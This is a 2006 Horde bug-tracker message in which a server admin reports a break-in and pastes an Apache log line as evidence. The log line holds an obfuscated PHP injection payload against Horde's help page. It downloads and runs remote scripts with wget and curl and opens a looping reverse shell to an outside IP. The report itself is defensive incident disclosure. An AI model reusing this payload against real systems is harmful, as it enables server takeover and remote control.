[Tickets #3856] NEW: security issue
bugs@bugs.horde.org
bugs at bugs.horde.org
Sat Apr 29 18:44:58 PDT 2006
DO NOT REPLY TO THIS MESSAGE. THIS EMAIL ADDRESS IS NOT MONITORED.
Ticket URL: http://bugs.horde.org/ticket/?id=3856
-----------------------------------------------------------------------
Ticket | 3856
Created By | admin at cw3host.com
Summary | security issue
Queue | IMP
Version | HEAD
State | Unconfirmed
Priority | 3. High
Type | Bug
Owners |
-----------------------------------------------------------------------
admin at cw3host.com (2006-04-29 18:44) wrote:
Found this in my logs after cleaning out hacker files in TMP directory
Server type is Red Hat Linux running H-Sphere
/hsphere/shared/apache/htdocs//horde//services/help/index.php 216.65.11.137
- - [28/Apr/2006:10:00:12 -0500] "GET
//horde//services/help/?show=about&module=;\".passthru(\"wget%20http:\".chr(
47).\"\".chr(47).\"81.58.26.26\".chr(47).\"libsh\".chr(47).\"ping.txt;mv%20p
ing.txt%20temp2006;perl%20temp2006%20217.160.242.90%20801;wget%20http:\".chr
(47).\"\".chr(47).\"81.58.26.26\".chr(47).\"libsh\".chr(47).\"ping;chmod%20+
x%20ping;.\".chr(47).\"ping%20217.160.242.90%208081;curl%20-o%20ping%20http:
\".chr(47).\"\".chr(47).\"81.58.26.26\".chr(47).\"libsh\".chr(47).\"ping;chm
od%20+x%20ping;.\".chr(47).\"ping%20217.160.242.90%208081;cd%20\".chr(47).\"
tmp\".chr(47).\";curl%20-o%20temp2006%20http:\".chr(47).\"\".chr(47).\"81.58
.26.26\".chr(47).\"libsh\".chr(47).\"ping.txt;while%20[%201%20];do%20perl%20
temp2006%20217.160.242.90%208081;done;wget%20http:\".chr(47).\"\".chr(47).\"
81.58.26.26\".chr(47).\"libsh\".chr(47).\"ping;chmod%20+x%20ping;.\".chr(47)
.\"ping%20217.160.242.90%208081;curl%20-o%20ping%20http:\".chr(47).\"\".chr(
47).\"81.58.26.26\".chr(47).\"libsh\".chr(47).\"ping;chmod%20+x%20ping;.\".c
hr(47).\"ping%20217.160.242.90%208081\");'. HTTP/1.1" 200 3452 "-" "-"
More information about the bugs
mailing list